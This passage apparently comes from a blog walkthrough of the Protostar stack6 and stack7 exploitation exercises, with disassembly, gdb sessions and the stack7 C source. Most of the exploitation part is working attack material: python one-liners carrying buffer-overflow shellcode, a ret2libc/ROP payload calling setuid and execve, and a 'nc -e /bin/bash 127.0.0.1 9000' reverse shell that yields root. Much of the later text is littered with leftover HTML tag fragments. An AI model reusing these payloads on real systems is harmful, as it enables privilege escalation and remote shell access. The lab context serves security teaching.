 80484fd:   83 e4 f0                and    esp,0xfffffff0
 8048500:   e8 7f ff ff ff          call   8048484 <getpath>
 8048505:   89 ec                   mov    esp,ebp
 8048507:   5d                      pop    ebp
 8048508:   c3                      ret    
 8048509:   90                      nop
 804850a:   90                      nop
 804850b:   90                      nop
 804850c:   90                      nop
 804850d:   90                      nop
 804850e:   90                      nop
 804850f:   90                      nop

08048510 <__libc_csu_fini>:
 8048510:   55                      push   ebp
 8048511:   89 e5                   mov    ebp,esp
 8048513:   5d                      pop    ebp
 8048514:   c3                      ret    
 8048515:   8d 74 26 00             lea    esi,[esi+eiz*1+0x0]
 8048519:   8d bc 27 00 00 00 00    lea    edi,[edi+eiz*1+0x0]

08048520 <__libc_csu_init>:
 8048520:   55                      push   ebp
 8048521:   89 e5                   mov    ebp,esp
 8048523:   57                      push   edi
 8048524:   56                      push   esi
 8048525:   53                      push   ebx
 8048526:   e8 4f 00 00 00          call   804857a <__i686.get_pc_thunk.bx>
 804852b:   81 c3 c1 11 00 00       add    ebx,0x11c1
 8048531:   83 ec 1c                sub    esp,0x1c
 8048534:   e8 f7 fd ff ff          call   8048330 <_init>
 8048539:   8d bb 18 ff ff ff       lea    edi,[ebx-0xe8]
 804853f:   8d 83 18 ff ff ff       lea    eax,[ebx-0xe8]
 8048545:   29 c7                   sub    edi,eax
 8048547:   c1 ff 02                sar    edi,0x2
 804854a:   85 ff                   test   edi,edi
 804854c:   74 24                   je     8048572 <__libc_csu_init+0x52>
 804854e:   31 f6                   xor    esi,esi
 8048550:   8b 45 10                mov    eax,DWORD PTR [ebp+0x10]
 8048553:   89 44 24 08             mov    DWORD PTR [esp+0x8],eax
 8048557:   8b 45 0c                mov    eax,DWORD PTR [ebp+0xc]
 804855a:   89 44 24 04             mov    DWORD PTR [esp+0x4],eax
 804855e:   8b 45 08                mov    eax,DWORD PTR [ebp+0x8]
 8048561:   89 04 24                mov    DWORD PTR [esp],eax
 8048564:   ff 94 b3 18 ff ff ff    call   DWORD PTR [ebx+esi*4-0xe8]
 804856b:   83 c6 01                add    esi,0x1
 804856e:   39 fe                   cmp    esi,edi
 8048570:   72 de                   jb     8048550 <__libc_csu_init+0x30>
 8048572:   83 c4 1c                add    esp,0x1c
 8048575:   5b                      pop    ebx
 8048576:   5e                      pop    esi
 8048577:   5f                      pop    edi
 8048578:   5d                      pop    ebp
 8048579:   c3                      ret    

0804857a <__i686.get_pc_thunk.bx>:
 804857a:   8b 1c 24                mov    ebx,DWORD PTR [esp]
 804857d:   c3                      ret    
 804857e:   90                      nop
 804857f:   90                      nop

08048580 <__do_global_ctors_aux>:
 8048580:   55                      push   ebp
 8048581:   89 e5                   mov    ebp,esp
 8048583:   53                      push   ebx
 8048584:   83 ec 04                sub    esp,0x4
 8048587:   a1 04 96 04 08          mov    eax,ds:0x8049604
 804858c:   83 f8 ff                cmp    eax,0xffffffff
 804858f:   74 13                   je     80485a4 <__do_global_ctors_aux+0x24>
 8048591:   bb 04 96 04 08          mov    ebx,0x8049604
 8048596:   66 90                   xchg   ax,ax
 8048598:   83 eb 04                sub    ebx,0x4
 804859b:   ff d0                   call   eax
 804859d:   8b 03                   mov    eax,DWORD PTR [ebx]
 804859f:   83 f8 ff                cmp    eax,0xffffffff
 80485a2:   75 f4                   jne    8048598 <__do_global_ctors_aux+0x18>
 80485a4:   83 c4 04                add    esp,0x4
 80485a7:   5b                      pop    ebx
 80485a8:   5d                      pop    ebp
 80485a9:   c3                      ret    
 80485aa:   90                      nop
 80485ab:   90                      nop

Disassembly of section .fini:

080485ac <_fini>:
 80485ac:   55                      push   ebp
 80485ad:   89 e5                   mov    ebp,esp
 80485af:   53                      push   ebx
 80485b0:   83 ec 04                sub    esp,0x4
 80485b3:   e8 00 00 00 00          call   80485b8 <_fini+0xc>
 80485b8:   5b                      pop    ebx
 80485b9:   81 c3 34 11 00 00       add    ebx,0x1134
 80485bf:   e8 3c fe ff ff          call   8048400 <__do_global_dtors_aux>
 80485c4:   59                      pop    ecx
 80485c5:   5b                      pop    ebx
 80485c6:   c9                      leave  
 80485c7:   c3                      ret

All we're looking for here is a ret instruction, there are a few, we'll use the 1 on line 258, the address of this is 80485a9 so this will be our return address.

After the return address we insert some junk data (4 bytes) and then we will put the address of our shellcode.

First let's find the address that our shellcode will be at, this needs to be done in 2 terminals:

1 2	`user@protostar:/opt/protostar/bin$ ./stack6` input path please:

root@protostar:/# ps ax | grep stack6
 2221 pts/0    S+     0:00 ./stack6
 2268 pts/1    S+     0:00 grep stack6
root@protostar:/# gdb -q -p 2221
Attaching to process 2221
Reading symbols from /opt/protostar/bin/stack6...done.
Reading symbols from /lib/libc.so.6...Reading symbols from /usr/lib/debug/lib/libc-2.11.2.so...done.
(no debugging symbols found)...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...Reading symbols from /usr/lib/debug/lib/ld-2.11.2.so...done.
(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
0xb7f53c1e in __read_nocancel () at ../sysdeps/unix/syscall-template.S:82
82  ../sysdeps/unix/syscall-template.S: No such file or directory.
    in ../sysdeps/unix/syscall-template.S
(gdb) set disassembly-flavor intel
Current language:  auto
The current source language is "auto; currently asm".
(gdb) disassemble getpath
Dump of assembler code for function getpath:
0x08048484 <getpath+0>: push   ebp
0x08048485 <getpath+1>: mov    ebp,esp
0x08048487 <getpath+3>: sub    esp,0x68
0x0804848a <getpath+6>: mov    eax,0x80485d0
0x0804848f <getpath+11>:    mov    DWORD PTR [esp],eax
0x08048492 <getpath+14>:    call   0x80483c0 <printf@plt>
0x08048497 <getpath+19>:    mov    eax,ds:0x8049720
0x0804849c <getpath+24>:    mov    DWORD PTR [esp],eax
0x0804849f <getpath+27>:    call   0x80483b0 <fflush@plt>
0x080484a4 <getpath+32>:    lea    eax,[ebp-0x4c]
0x080484a7 <getpath+35>:    mov    DWORD PTR [esp],eax
0x080484aa <getpath+38>:    call   0x8048380 <gets@plt>
0x080484af <getpath+43>:    mov    eax,DWORD PTR [ebp+0x4]
0x080484b2 <getpath+46>:    mov    DWORD PTR [ebp-0xc],eax
0x080484b5 <getpath+49>:    mov    eax,DWORD PTR [ebp-0xc]
0x080484b8 <getpath+52>:    and    eax,0xbf000000
0x080484bd <getpath+57>:    cmp    eax,0xbf000000
0x080484c2 <getpath+62>:    jne    0x80484e4 <getpath+96>
0x080484c4 <getpath+64>:    mov    eax,0x80485e4
0x080484c9 <getpath+69>:    mov    edx,DWORD PTR [ebp-0xc]
0x080484cc <getpath+72>:    mov    DWORD PTR [esp+0x4],edx
0x080484d0 <getpath+76>:    mov    DWORD PTR [esp],eax
0x080484d3 <getpath+79>:    call   0x80483c0 <printf@plt>
0x080484d8 <getpath+84>:    mov    DWORD PTR [esp],0x1
0x080484df <getpath+91>:    call   0x80483a0 <_exit@plt>
0x080484e4 <getpath+96>:    mov    eax,0x80485f0
0x080484e9 <getpath+101>:   lea    edx,[ebp-0x4c]
0x080484ec <getpath+104>:   mov    DWORD PTR [esp+0x4],edx
0x080484f0 <getpath+108>:   mov    DWORD PTR [esp],eax
0x080484f3 <getpath+111>:   call   0x80483c0 <printf@plt>
0x080484f8 <getpath+116>:   leave  
0x080484f9 <getpath+117>:   ret    
End of assembler dump.
(gdb) break *0x080484af
Breakpoint 1 at 0x80484af: file stack6/stack6.c, line 15.
(gdb) c
Continuing.

1	`AAAAAAAAAAAA`

Breakpoint 1, getpath () at stack6/stack6.c:15
15  stack6/stack6.c: No such file or directory.
    in stack6/stack6.c
Current language:  auto
The current source language is "auto; currently c".
(gdb) x/20xw $esp
0xbffff770: 0xbffff78c  0x00000000  0xb7fe1b28  0x00000001
0xbffff780: 0x00000000  0x00000001  0xb7fff8f8  0x41414141
0xbffff790: 0x41414141  0x41414141  0xbffff700  0xb7eada75
0xbffff7a0: 0xb7fd7ff4  0x080496ec  0xbffff7b8  0x0804835c
0xbffff7b0: 0xb7ff1040  0x080496ec  0xbffff7e8  0x08048539

This means our payload will start at 0xbffff780+0xc = 0xbffff78c.

For this challenge I will put the shellcode at the end of the payload, we know the starting address of our payload and how many bytes until the shellcode so our shellcode will be at 0xbffff78c+0x58 = 0xbffff7e4.

I first tried with a normal shellcode that I had written but it didn't work:

user@protostar:/opt/protostar/bin$ python -c 'print "A"*80 + "\xa9\x85\x04\x08" + "\xe4\xf7\xff\xbf" + "\xeb\x25\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x89\xd8\x5b\x88\x43\x09\xb0\x0b\x31\xd2\xb2\x09\x42\x89\x1c\x13\x31\xc9\x89\x4b\x0e\x8d\x0c\x13\x8d\x53\x0e\xcd\x80\xe8\xd6\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43"' | ./stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAAAAAA�������%1�̀��[�C  �
                                                                                                                                 1Ҳ B�1ɉK�/span/span
span class="code-line"span class="go"       �S̀�����/bin/bashABBBBCCCC/span/span
span class="code-line"span class="gp"user@protostar:/opt/protostar/bin$/span/span
span class="code-line"/code/pre/div
/td/tr/table
pSo it launched... Don't know what happened here, after some investigation I decided that it did actually run code/bin/bash/code but exited straight away./p
pAfter some thinking I decide that I'm going to get codeexecve/code to run codebash/code and that to run codenc/code to execute a shell, there are plenty of ways to get a shell in this situation, creating a script and running that, running codenc/code directly..., this was just the first 1 that come to mind for me./p
pcodenc/code or a href="http://netcat.sourceforge.net/" target="_blank"netcat/a is a handy networking tool that can be used for a number of things, here we will use it to execute a shell./p
pSo I rewrote the shellcode, started codenc/code listening on port 9000 in 1 terminal:/p
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"user@protostar:~$ /spannc -l -p span class="m"9000/span/span
span class="code-line"/code/pre/div
/td/tr/table
pAnd then launched the exploit with the new shellcode:/p
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span
span class="code-line"span class="normal"2/span/span
span class="code-line"span class="normal"3/span/span
span class="code-line"span class="normal"4/span/span
span class="code-line"span class="normal"5/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"user@protostar:/opt/protostar/bin$ /spanpython -c span class="s1"#39;print quot;Aquot;*80 + quot;\xa9\x85\x04\x08quot; + quot;\xe4\xf7\xff\xbfquot; + quot;\xeb\x37\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x89\xd8\x5b\x88\x43\x09\x88\x43\x0c\x88\x43\x2b\xb0\x0b\x31\xd2\xb2\x09\x42\x89\x5b\x2c\x8d\x0c\x13\x89\x4b\x30\x8d\x4b\x0d\x89\x4b\x34\x31\xc9\x89\x4b\x38\x8d\x4b\x2c\x8d\x53\x34\xcd\x80\xe8\xc4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x2d\x63\x42\x6e\x63\x20\x2d\x65\x20\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x20\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x20\x39\x30\x30\x30\x43\x44\x44\x44\x44\x45\x45\x45\x45\x46\x46\x46\x46\x47\x47\x47\x47quot;#39;/span span class="p"|/span ./stack6/span
span class="code-line"span class="go"input path please: got path 1�̀��[�C    �C/span/span
span class="code-line"span class="go"                                                                                                                                  �C+�/span/span
span class="code-line"span class="go"                                                                                                                                      1ҲB�[,�/span/span
span class="code-line"span class="go"�K41ɉK8�K,�S4̀�����/bin/bashA-cBnc -e /bin/bash 127.0.0.1 9000CDDDDEEEEFFFFGGGG/span/span
span class="code-line"/code/pre/div
/td/tr/table
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span
span class="code-line"span class="normal" 2/span/span
span class="code-line"span class="normal" 3/span/span
span class="code-line"span class="normal" 4/span/span
span class="code-line"span class="normal" 5/span/span
span class="code-line"span class="normal" 6/span/span
span class="code-line"span class="normal" 7/span/span
span class="code-line"span class="normal" 8/span/span
span class="code-line"span class="normal" 9/span/span
span class="code-line"span class="normal"10/span/span
span class="code-line"span class="normal"11/span/span
span class="code-line"span class="normal"12/span/span
span class="code-line"span class="normal"13/span/span
span class="code-line"span class="normal"14/span/span
span class="code-line"span class="normal"15/span/span
span class="code-line"span class="normal"16/span/span
span class="code-line"span class="normal"17/span/span
span class="code-line"span class="normal"18/span/span
span class="code-line"span class="normal"19/span/span
span class="code-line"span class="normal"20/span/span
span class="code-line"span class="normal"21/span/span
span class="code-line"span class="normal"22/span/span
span class="code-line"span class="normal"23/span/span
span class="code-line"span class="normal"24/span/span
span class="code-line"span class="normal"25/span/span
span class="code-line"span class="normal"26/span/span
span class="code-line"span class="normal"27/span/span
span class="code-line"span class="normal"28/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"ls/span/span
span class="code-line"span class="go"final0/span/span
span class="code-line"span class="go"final1/span/span
span class="code-line"span class="go"final2/span/span
span class="code-line"span class="go"format0/span/span
span class="code-line"span class="go"format1/span/span
span class="code-line"span class="go"format2/span/span
span class="code-line"span class="go"format3/span/span
span class="code-line"span class="go"format4/span/span
span class="code-line"span class="go"heap0/span/span
span class="code-line"span class="go"heap1/span/span
span class="code-line"span class="go"heap2/span/span
span class="code-line"span class="go"heap3/span/span
span class="code-line"span class="go"net0/span/span
span class="code-line"span class="go"net1/span/span
span class="code-line"span class="go"net2/span/span
span class="code-line"span class="go"net3/span/span
span class="code-line"span class="go"net4/span/span
span class="code-line"span class="go"stack0/span/span
span class="code-line"span class="go"stack1/span/span
span class="code-line"span class="go"stack2/span/span
span class="code-line"span class="go"stack3/span/span
span class="code-line"span class="go"stack4/span/span
span class="code-line"span class="go"stack5/span/span
span class="code-line"span class="go"stack6/span/span
span class="code-line"span class="go"stack7/span/span
span class="code-line"span class="go"whoami/span/span
span class="code-line"span class="go"root/span/span
span class="code-line"/code/pre/div
/td/tr/table
pSo, we can still run our shellcode, we just have an extra step to bypass the check that is done on the return address./p
h2Stack6: Ret2Libc and ROP/h2
pHere we will recreate the exact same exploit for the same application but without using any shellcode./p
pFirst its easiest if we create what we want to run in C first:/p
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span
span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="n"setuid/spanspan class="p"(/spanspan class="mi"0/spanspan class="p");/spanspan class="w"/span/span
span class="code-line"span class="n"execve/spanspan class="p"(/spanspan class="s"quot;/bin/bashquot;/spanspan class="p",/spanspan class="w" /spanspan class="p"{/spanspan class="w" /spanspan class="s"quot;/bin/bashquot;/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;-cquot;/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;nc -e /bin/bash 127.0.0.1 9000quot;/spanspan class="w" /spanspan class="p"},/spanspan class="w" /spanspan class="nb"NULL/spanspan class="p");/spanspan class="w"/span/span
span class="code-line"/code/pre/div
/td/tr/table
pSo we need to find the addresses of both codesetuid/code and codeexecve/code, we use codegdb/code for this:/p
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span
span class="code-line"span class="normal" 2/span/span
span class="code-line"span class="normal" 3/span/span
span class="code-line"span class="normal" 4/span/span
span class="code-line"span class="normal" 5/span/span
span class="code-line"span class="normal" 6/span/span
span class="code-line"span class="normal" 7/span/span
span class="code-line"span class="normal" 8/span/span
span class="code-line"span class="normal" 9/span/span
span class="code-line"span class="normal"10/span/span
span class="code-line"span class="normal"11/span/span
span class="code-line"span class="normal"12/span/span
span class="code-line"span class="normal"13/span/span
span class="code-line"span class="normal"14/span/span
span class="code-line"span class="normal"15/span/span
span class="code-line"span class="normal"16/span/span
span class="code-line"span class="normal"17/span/span
span class="code-line"span class="normal"18/span/span
span class="code-line"span class="normal"19/span/span
span class="code-line"span class="normal"20/span/span
span class="code-line"span class="normal"21/span/span
span class="code-line"span class="normal"22/span/span
span class="code-line"span class="normal"23/span/span
span class="code-line"span class="normal"24/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"user@protostar:/opt/protostar/bin$ /spangdb -q ./stack6/span
span class="code-line"span class="go"Reading symbols from /opt/protostar/bin/stack6...done./span/span
span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"disassemble main/span/span
span class="code-line"span class="go"Dump of assembler code for function main:/span/span
span class="code-line"span class="go"0x080484fa lt;main+0gt;:    push   %ebp/span/span
span class="code-line"span class="go"0x080484fb lt;main+1gt;:    mov    %esp,%ebp/span/span
span class="code-line"span class="go"0x080484fd lt;main+3gt;:    and    $0xfffffff0,%esp/span/span
span class="code-line"span class="go"0x08048500 lt;main+6gt;:    call   0x8048484 lt;getpathgt;/span/span
span class="code-line"span class="go"0x08048505 lt;main+11gt;:   mov    %ebp,%esp/span/span
span class="code-line"span class="go"0x08048507 lt;main+13gt;:   pop    %ebp/span/span
span class="code-line"span class="go"0x08048508 lt;main+14gt;:   ret    /span/span
span class="code-line"span class="go"End of assembler dump./span/span
span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"break *0x080484fa/span/span
span class="code-line"span class="go"Breakpoint 1 at 0x80484fa: file stack6/stack6.c, line 26./span/span
span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r/span/span
span class="code-line"span class="go"Starting program: /opt/protostar/bin/stack6 /span/span
span class="code-line"/span
span class="code-line"span class="go"Breakpoint 1, main (argc=1, argv=0xbffff864) at stack6/stack6.c:26/span/span
span class="code-line"span class="go"26  stack6/stack6.c: No such file or directory./span/span
span class="code-line"span class="go"    in stack6/stack6.c/span/span
span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"print setuid/span/span
span class="code-line"span class="gp"$/spanspan class="nv"1/span span class="o"=/span span class="o"{/spanlt;text variable, no debug infogt;span class="o"}/span 0xb7f2ec80 lt;__setuidgt;/span
span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"print execve/span/span
span class="code-line"span class="gp"$/spanspan class="nv"2/span span class="o"=/span span class="o"{/spanlt;text variable, no debug infogt;span class="o"}/span 0xb7f2e170 lt;__execvegt;/span
span class="code-line"/code/pre/div
/td/tr/table
pAs you can see, the address of setuid doesn't start with codebf/code so we can use this as our initial return address./p
pWe now want to address of our ROP gadget, this will just be responsible for cleaning up the stack after the call to setuid, so this time we want a codepop [register], ret/code sequence of instructions./p
pAgain we can use codeobjdump/code to find this, I won't post another dump of the binary but there are many of these sequencies we can use, I'll use the one at code0x80485a8/code./p
pWe can put our strings in to variables but this time, because we can insert null bytes (strong\0/strong), I will put the strings at the start of the payload./p
pThe number of bytes that the strings will occupy is:/p
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span
span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"user@protostar:/opt/protostar/bin$ /spanspan class="nb"echo/span -n span class="s2"quot;/bin/bash -c nc -e /bin/bash 127.0.0.1 9000 quot;/span span class="p"|/span wc -c/span
span class="code-line"span class="go"44/span/span
span class="code-line"/code/pre/div
/td/tr/table
pWe know we have 80 bytes before we overwrite the return address, so we need code80-44 = 36/code bytes of padding after our strings./p
pSo here is how we want the stack to look after we overflow it:/p
pimg src="/assets/images/x86-32-linux/pseudo-stack.jpg" width="400"/p
pWe have all of these addresses except 11, 12, 14 and 15. Let's work these out now./p
pFirst 14 is just 10 bytes away from the start of our payload, and we already know the start of our payload is code0xbffff78c/code from the last exploit, so code0xbffff78c+0xa = 0xbffff796/code./p
p15 is just 3 bytes from 13 so code0xbffff796+0x3 = 0xbffff799/code./p
p11 is the start of our payload plus 80 bytes, then plus code8*4 = 32/code (there are 8 addresses before the argument list starts, each 4 bytes long), so code0xbffff78c+0x50+0x20 = 0xbffff7fc/code./p
p12 is just code3*4 = 12/code bytes away from 10 (because there are 3 4 byte addresses before the null pointer), so code0xbffff7fc+0xc = 0xbffff808/code./p
pSo with all of this information our stack should look like this:/p
pimg src="/assets/images/x86-32-linux/stack6-payload.jpg" width="400"/p
pObviously all of the addresses have to be put in in a href="https://en.wikipedia.org/wiki/Endianness#Little-endian" target="_blank"little endian/a format./p
pNow we can test this, first start our listener:/p
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"user@protostar:~$ /spannc -l -p span class="m"9000/span/span
span class="code-line"/code/pre/div
/td/tr/table
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span
span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"user@protostar:/opt/protostar/bin$ /spanpython -c span class="s1"#39;print quot;/bin/bash\x00-c\x00nc -e /bin/bash 127.0.0.1 9000\x00quot; + quot;Aquot; * 36 + quot;\x80\xec\xf2\xb7quot; + quot;\xa8\x85\x04\x08quot; + quot;\x00\x00\x00\x00quot; + quot;\x70\xe1\xf2\xb7quot; + quot;JUNKquot; + quot;\x8c\xf7\xff\xbfquot; + quot;\xfc\xf7\xff\xbfquot; + quot;\x08\xf8\xff\xbfquot; + quot;\x8c\xf7\xff\xbfquot; + quot;\x96\xf7\xff\xbfquot; + quot;\x99\xf7\xff\xbfquot; + quot;\x00\x00\x00\x00quot;#39;/span span class="p"|/span ./stack6/span
span class="code-line"span class="go"input path please: got path /bin/bash/span/span
span class="code-line"/code/pre/div
/td/tr/table
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span
span class="code-line"span class="normal"2/span/span
span class="code-line"span class="normal"3/span/span
span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"pwd/span/span
span class="code-line"span class="go"/opt/protostar/bin/span/span
span class="code-line"span class="go"whoami/span/span
span class="code-line"span class="go"root/span/span
span class="code-line"/code/pre/div
/td/tr/table
pSolved!/p
h2Stack7: The App/h2
pThis challenge is very similar to the previous 1 except the return address is not allowed to begin with codeb/code instead of codebf/code:/p
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span
span class="code-line"span class="normal" 2/span/span
span class="code-line"span class="normal" 3/span/span
span class="code-line"span class="normal" 4/span/span
span class="code-line"span class="normal" 5/span/span
span class="code-line"span class="normal" 6/span/span
span class="code-line"span class="normal" 7/span/span
span class="code-line"span class="normal" 8/span/span
span class="code-line"span class="normal" 9/span/span
span class="code-line"span class="normal"10/span/span
span class="code-line"span class="normal"11/span/span
span class="code-line"span class="normal"12/span/span
span class="code-line"span class="normal"13/span/span
span class="code-line"span class="normal"14/span/span
span class="code-line"span class="normal"15/span/span
span class="code-line"span class="normal"16/span/span
span class="code-line"span class="normal"17/span/span
span class="code-line"span class="normal"18/span/span
span class="code-line"span class="normal"19/span/span
span class="code-line"span class="normal"20/span/span
span class="code-line"span class="normal"21/span/span
span class="code-line"span class="normal"22/span/span
span class="code-line"span class="normal"23/span/span
span class="code-line"span class="normal"24/span/span
span class="code-line"span class="normal"25/span/span
span class="code-line"span class="normal"26/span/span
span class="code-line"span class="normal"27/span/span
span class="code-line"span class="normal"28/span/span
span class="code-line"span class="normal"29/span/span
span class="code-line"span class="normal"30/span/span
span class="code-line"span class="normal"31/span/span
span class="code-line"span class="normal"32/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdlib.hgt;/spanspan class="cp"/span/span
span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;unistd.hgt;/spanspan class="cp"/span/span
span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdio.hgt;/spanspan class="cp"/span/span
span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;string.hgt;/spanspan class="cp"/span/span
span class="code-line"/span
span class="code-line"span class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="nf"getpath/spanspan class="p"()/spanspan class="w"/span/span
span class="code-line"span class="p"{/spanspan class="w"/span/span
span class="code-line"span class="w"  /spanspan class="kt"char/spanspan class="w" /spanspan class="n"buffer/spanspan class="p"[/spanspan class="mi"64/spanspan class="p"];/spanspan class="w"/span/span
span class="code-line"span class="w"  /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"ret/spanspan class="p";/spanspan class="w"/span/span
span class="code-line"/span
span class="code-line"span class="w"  /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;input path please: quot;/spanspan class="p");/spanspan class="w" /spanspan class="n"fflush/spanspan class="p"(/spanspan class="n"stdout/spanspan class="p");/spanspan class="w"/span/span
span class="code-line"/span
span class="code-line"span class="w"  /spanspan class="n"gets/spanspan class="p"(/spanspan class="n"buffer/spanspan class="p");/spanspan class="w"/span/span
span class="code-line"/span
span class="code-line"span class="w"  /spanspan class="n"ret/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"__builtin_return_address/spanspan class="p"(/spanspan class="mi"0/spanspan class="p");/spanspan class="w"/span/span
span class="code-line"/span
span class="code-line"span class="w"  /spanspan class="k"if/spanspan class="p"((/spanspan class="n"ret/spanspan class="w" /spanspan class="o"amp;/spanspan class="w" /spanspan class="mh"0xb0000000/spanspan class="p")/spanspan class="w" /spanspan class="o"==/spanspan class="w" /spanspan class="mh"0xb0000000/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span
span class="code-line"span class="w"    /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;bzzzt (%p)/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"ret/spanspan class="p");/spanspan class="w"/span/span
span class="code-line"span class="w"    /spanspan class="n"_exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span
span class="code-line"span class="w"  /spanspan class="p"}/spanspan class="w"/span/span
span class="code-line"/span
span class="code-line"span class="w"  /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;got path %s/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"buffer/spanspan class="p");/spanspan class="w"/span/span
span class="code-line"span class="w"  /spanspan class="k"return/spanspan class="w" /spanspan class="n"strdup/spanspan class="p"(/spanspan class="n"buffer/spanspan class="p");/spanspan class="w"/span/span
span class="code-line"span class="p"}/spanspan class="w"/span/span
span class="code-line"/span
span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"main/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"argc/spanspan class="p",/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="o"**/spanspan class="n"argv/spanspan class="p")/spanspan class="w"/span/span
span class="code-line"span class="p"{/spanspan class="w"/span/span
span class="code-line"span class="w"  /spanspan class="n"getpath/spanspan class="p"();/spanspan class="w"/span/span
span class="code-line"/span
span class="code-line"/span
span class="code-line"/span
span class="code-line"span class="p"}/spanspan class="w"/span/span
span class="code-line"/code/pre/div
/td/tr/table
h2Stack7: Exploitation/h2
pWe could use exactly the same method as the last 1 and just put a pointer to a coderet/code instruction before the call to codesetuid/code but I want to show a different way to do it./p
pI'm going to use codesystem/code instead of codeexecve/code and put my string into an environment variable./p
pFirst let's find the addresses of codesetuid/code and codesystem/code:/p
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span
span class="code-line"span class="normal" 2/span/span
span class="code-line"span class="normal" 3/span/span
span class="code-line"span class="normal" 4/span/span
span class="code-line"span class="normal" 5/span/span
span class="code-line"span class="normal" 6/span/span
span class="code-line"span class="normal" 7/span/span
span class="code-line"span class="normal" 8/span/span
span class="code-line"span class="normal" 9/span/span
span class="code-line"span class="normal"10/span/span
span class="code-line"span class="normal"11/span/span
span class="code-line"span class="normal"12/span/span
span class="code-line"span class="normal"13/span/span
span class="code-line"span class="normal"14/span/span
span class="code-line"span class="normal"15/span/span
span class="code-line"span class="normal"16/span/span
span class="code-line"span class="normal"17/span/span
span class="code-line"span class="normal"18/span/span
span class="code-line"span class="normal"19/span/span
span class="code-line"span class="normal"20/span/span
span class="code-line"span class="normal"21/span/span
span class="code-line"span class="normal"22/span/span
span class="code-line"span class="normal"23/span/span
span class="code-line"span class="normal"24/span/span
span class="code-line"span class="normal"25/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"user@protostar:/opt/protostar/bin$ /spangdb -q ./stack7/span
span class="code-line"span class="go"Reading symbols from /opt/protostar/bin/stack7...done./span/span
span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"set disassembly-flavor intel/span/span
span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"disassemble main/span/span
span class="code-line"span class="go"Dump of assembler code for function main:/span/span
span class="code-line"span class="go"0x08048545 lt;main+0gt;:    push   ebp/span/span
span class="code-line"span class="go"0x08048546 lt;main+1gt;:    mov    ebp,esp/span/span
span class="code-line"span class="go"0x08048548 lt;main+3gt;:    and    esp,0xfffffff0/span/span
span class="code-line"span class="go"0x0804854b lt;main+6gt;:    call   0x80484c4 lt;getpathgt;/span/span
